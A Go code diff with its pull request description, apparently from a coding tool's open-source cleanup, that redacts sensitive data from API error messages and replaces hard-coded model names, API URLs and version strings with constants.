-		return fmt.Sprintf(`{"error": "HTTP %d: %s"}`, resp.StatusCode, string(body))
+		return fmt.Sprintf(`{"error": "HTTP %d: %s"}`, resp.StatusCode, redactSensitive(string(body)))
 	}
 	return string(body)
 }
@@ -2279,7 +2276,7 @@ func callVisionAnalysis(sctx *SessionContext, imageURL, prompt string) string {
 
 	respData, _ := io.ReadAll(resp.Body)
 	if resp.StatusCode != 200 {
-		return jsonError(fmt.Sprintf("Vision API error %d: %s", resp.StatusCode, string(respData)))
+		return jsonError(fmt.Sprintf("Vision API error %d: %s", resp.StatusCode, redactSensitive(string(respData))))
 	}
 
 	var result map[string]interface{}

--- a/tools.go
+++ b/tools.go
@@ -2236,7 +2236,7 @@ func callVisionAnalysis(sctx *SessionContext, imageURL, prompt string) string {
 
 	// Direct Claude Vision call
 	reqBody := map[string]interface{}{
-		"model":      "claude-haiku-4-5-20251001",
+		"model":      ModelHaiku,
 		"max_tokens": 2000,
 		"messages": []map[string]interface{}{
 			{
@@ -2259,13 +2259,13 @@ func callVisionAnalysis(sctx *SessionContext, imageURL, prompt string) string {
 	}
 
 	data, _ := json.Marshal(reqBody)
-	req, err := http.NewRequest("POST", "https://api.anthropic.com/v1/messages", bytes.NewReader(data))
+	req, err := http.NewRequest("POST", AnthropicMessagesURL, bytes.NewReader(data))
 	if err != nil {
 		return jsonError("Failed to create vision request: " + err.Error())
 	}
 	req.Header.Set("Content-Type", "application/json")
 	req.Header.Set("x-api-key", apiKey)
-	req.Header.Set("anthropic-version", "2023-06-01")
+	req.Header.Set("anthropic-version", AnthropicVersion)
 
 	client := &http.Client{Timeout: 30 * time.Second}
 	resp, err := client.Do(req)


### PR DESCRIPTION
## Summary
- add an open-source readiness scope document covering phased cleanup and product-boundary decisions
- split Anthropic and QualityMax auth entry points, document credential storage, and make telemetry opt-in
- add redaction for common credential patterns across API errors, telemetry, command output, and local test output
- remove backend-internal implementation references and require explicit repository training consent

## Verification
- GOCACHE=/tmp/qmax-code-gocache go test ./...